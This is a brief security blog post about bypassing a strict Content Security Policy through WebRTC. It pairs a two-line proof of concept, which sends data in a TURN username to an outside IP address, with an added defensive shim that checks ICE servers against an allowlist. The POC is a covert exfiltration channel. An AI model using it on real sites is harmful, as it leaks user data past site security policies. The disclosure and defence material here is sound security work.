Bypassing strict CSP by abusing WebRTC

I noticed recently that there was a PR in the W3C GitHub organisation on both the webappsec-csp and webrtc-pc specification repos adding a new webrtc-src repo. The PR in question:

[Screenshot of the PR, 2018-05-19]

Extracted POC:

// ICE server config pointing at a TURN server; the username and credential are sent to that host once ICE gathering starts.
var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
// Creating an offer and applying it as the local description starts ICE gathering, which contacts the TURN server.
pc.createOffer().then((sdp) => pc.setLocalDescription(sdp));

Running the POC on the latest Chrome available does create a new WebRTC session as shown in chrome://webrtc-internals, but I haven't had the opportunity to turn this into a fully working POC.

[Screenshot of chrome://webrtc-internals showing the new session, 2018-05-19]

Under a strict CSP this WebRTC session should not have been created at all, but no existing directive covers WebRTC connections, which is the gap the proposed webrtc-src directive is meant to close. With more prodding, this could be turned into a viable attack. Thankfully, a fix will hopefully be merged into the spec, and fixes can then be added to the major browsers soon.
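As an added example (my own code, not the author's or the spec's), here is a defence-in-depth shim a site could run while the directive is pending: it checks the ICE server list handed to RTCPeerConnection against an allowlist of the site's own TURN/STUN hosts and reports anything else. The allowlist, the `report` callback and the global object passed to `installWebRtcGuard` are assumptions of this example.

```javascript
// Added example (not from the original post): a defence-in-depth shim that
// validates the ICE server list handed to RTCPeerConnection before the
// browser opens any ICE/TURN session, and reports anything off-policy.
// The allowlist of TURN/STUN hosts is assumed to be site-specific.

// Parse an ICE URL such as "turn:74.125.140.127:19305?transport=udp" into
// scheme, host and port. Returns null when it is not a recognised ICE URL.
function parseIceUrl(url) {
  const m = /^(stuns?|turns?):(\[[^\]]+\]|[^:?\/]+)(?::(\d+))?(\?.*)?$/i.exec(String(url));
  if (!m) return null;
  return { scheme: m[1].toLowerCase(), host: m[2].toLowerCase(), port: m[3] ? Number(m[3]) : null };
}

// Return the policy violations in an RTCPeerConnection configuration.
// A TURN entry pointing at a foreign host carries username and credential
// to that host, which is the channel the POC above relies on.
function checkIceServers(config, allowedHosts) {
  const violations = [];
  for (const server of (config && config.iceServers) || []) {
    const urls = Array.isArray(server.urls) ? server.urls : [server.urls];
    for (const url of urls) {
      const parsed = parseIceUrl(url);
      if (!parsed) { violations.push(`unparseable ICE url: ${url}`); continue; }
      if (allowedHosts.has(parsed.host)) continue;
      const creds = server.username ? "credentials attached" : "no credentials";
      violations.push(`ICE host not allowlisted: ${parsed.host} (${parsed.scheme}, ${creds})`);
    }
  }
  return violations;
}

// Wrap RTCPeerConnection (and setConfiguration) on the given global object,
// window in a browser. Off-policy configs are passed to `report` and refused.
function installWebRtcGuard(globalObj, allowedHosts, report) {
  const Original = globalObj.RTCPeerConnection;
  if (typeof Original !== "function") return false;
  const enforce = (config) => {
    const violations = checkIceServers(config, allowedHosts);
    if (violations.length) { report(violations); throw new Error("WebRTC config blocked by policy"); }
  };
  function Guarded(config, ...rest) { enforce(config); return new Original(config, ...rest); }
  Guarded.prototype = Original.prototype;
  const origSet = Original.prototype.setConfiguration;
  if (typeof origSet === "function") {
    Original.prototype.setConfiguration = function (config) { enforce(config); return origSet.call(this, config); };
  }
  globalObj.RTCPeerConnection = Guarded;
  return true;
}
```

The shim runs in the same realm as any injected script and can be circumvented, so treat it as telemetry and defence in depth rather than a substitute for a CSP directive enforced by the browser.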